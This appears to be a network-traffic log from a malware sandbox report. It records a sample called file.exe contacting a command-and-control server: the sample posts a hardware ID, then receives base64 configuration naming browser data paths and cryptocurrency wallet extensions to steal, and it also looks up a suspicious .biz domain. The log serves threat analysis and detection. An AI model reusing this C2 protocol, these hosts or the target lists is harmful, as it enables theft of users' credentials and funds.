Dec 7, 2024 13:00:02.880213976 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.880382061 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.880419970 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.881200075 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.881237030 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.881386995 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.881418943 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.882241964 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.882298946 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.882457018 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.882498026 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.883327007 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.883368969 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.883477926 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.883513927 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.884325027 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.884382963 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.884582043 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.884624004 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.885529995 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.885579109 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.885664940 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.885703087 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.886535883 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.886576891 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.886693001 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.886732101 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.887516022 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.887572050 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.887715101 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.887753010 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.888519049 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.888556957 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.888725042 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.888758898 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.889833927 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.889877081 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.890105963 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.890146017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.891206026 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.891249895 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.891386986 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.891418934 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.892417908 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.892472982 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.892524958 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.892565012 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.893186092 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.893225908 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.893337965 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.893377066 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.894020081 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.894057989 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.894136906 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.894175053 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.894805908 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.894844055 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.894998074 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.895037889 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.896070957 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.896111012 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.896269083 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.896307945 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.897022963 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.897063017 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.897272110 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.897310972 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.898015022 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.898071051 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.898137093 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.898173094 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.899023056 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.899060965 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.899269104 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.899307013 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.900649071 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.900690079 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.900779009 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.900818110 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.901658058 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.901694059 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.901956081 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.901997089 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.902731895 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.902789116 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.902870893 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.902913094 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.903438091 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.903480053 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.903502941 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.903541088 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.904228926 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.904264927 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.904469967 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.904509068 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.905311108 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.905350924 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.905520916 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.905554056 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.906361103 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.906399012 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.906577110 CET	80	49829	185.215.113.16	192.168.2.7
Dec 7, 2024 13:00:02.906615973 CET	49829	80	192.168.2.7	185.215.113.16
Dec 7, 2024 13:00:02.907378912 CET	80	49829	185.215.113.16	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 7, 2024 12:59:19.868691921 CET	192.168.2.7	1.1.1.1	0xb5bf	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 12:59:19.868902922 CET	192.168.2.7	1.1.1.1	0xb6f3	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 7, 2024 12:59:26.786653996 CET	192.168.2.7	1.1.1.1	0x3096	Standard query (0)	ogs.google.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 12:59:26.786886930 CET	192.168.2.7	1.1.1.1	0xb878	Standard query (0)	ogs.google.com	65	IN (0x0001)	false
Dec 7, 2024 12:59:26.808619022 CET	192.168.2.7	1.1.1.1	0x177b	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 7, 2024 12:59:26.808773994 CET	192.168.2.7	1.1.1.1	0x78b8	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 7, 2024 13:00:53.304936886 CET	192.168.2.7	1.1.1.1	0xb1b1	Standard query (0)	atten-supporse.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 7, 2024 12:59:20.006360054 CET	1.1.1.1	192.168.2.7	0xb5bf	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Dec 7, 2024 12:59:20.007038116 CET	1.1.1.1	192.168.2.7	0xb6f3	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 7, 2024 12:59:26.926156998 CET	1.1.1.1	192.168.2.7	0xb878	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 7, 2024 12:59:26.926683903 CET	1.1.1.1	192.168.2.7	0x3096	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 7, 2024 12:59:26.926683903 CET	1.1.1.1	192.168.2.7	0x3096	No error (0)	www3.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 7, 2024 12:59:26.947540998 CET	1.1.1.1	192.168.2.7	0x177b	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 7, 2024 12:59:26.947540998 CET	1.1.1.1	192.168.2.7	0x177b	No error (0)	plus.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 7, 2024 12:59:26.947606087 CET	1.1.1.1	192.168.2.7	0x78b8	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 7, 2024 13:00:53.443998098 CET	1.1.1.1	192.168.2.7	0xb1b1	No error (0)	atten-supporse.biz		104.21.16.9	A (IP address)	IN (0x0001)	false
Dec 7, 2024 13:00:53.443998098 CET	1.1.1.1	192.168.2.7	0xb1b1	No error (0)	atten-supporse.biz		172.67.165.166	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	185.215.113.206	80	6564	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 12:59:10.439096928 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 7, 2024 12:59:11.754575968 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 12:59:11.784635067 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 30 36 35 42 36 39 35 33 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="hwid"AF065B6953323653143898------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build"drum------HJJJDAEGIDHCBFHJJJEG--
Dec 7, 2024 12:59:12.246563911 CET	407	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:12 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 47 4e 6a 4e 57 52 6b 4e 54 5a 6b 4d 54 55 33 5a 6d 4d 77 5a 44 51 33 4d 57 52 68 4f 57 59 35 4d 7a 59 31 59 7a 67 34 4d 7a 4e 6d 4d 44 59 7a 59 32 45 31 4d 32 51 33 4f 57 51 7a 59 6a 51 77 4e 47 55 30 4d 54 59 34 4d 54 56 6b 4e 44 55 77 4f 44 59 79 4e 6a 4d 32 59 54 6c 6a 4f 47 5a 69 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MGNjNWRkNTZkMTU3ZmMwZDQ3MWRhOWY5MzY1Yzg4MzNmMDYzY2E1M2Q3OWQzYjQwNGU0MTY4MTVkNDUwODYyNjM2YTljOGZifHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 7, 2024 12:59:12.247884989 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJEC Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="message"browsers------CFHDBFIEGIDGIECBKJEC--
Dec 7, 2024 12:59:12.692886114 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:12 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 7, 2024 12:59:12.693120956 CET	1020	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29
Dec 7, 2024 12:59:12.694842100 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAE Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 2d 2d 0d 0a Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="message"plugins------DAKJDHIEBFIIDGDGDBAE--
Dec 7, 2024 12:59:13.143208027 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:12 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 7, 2024 12:59:13.143454075 CET	124	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
Dec 7, 2024 12:59:13.143465996 CET	1236	IN	Data Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
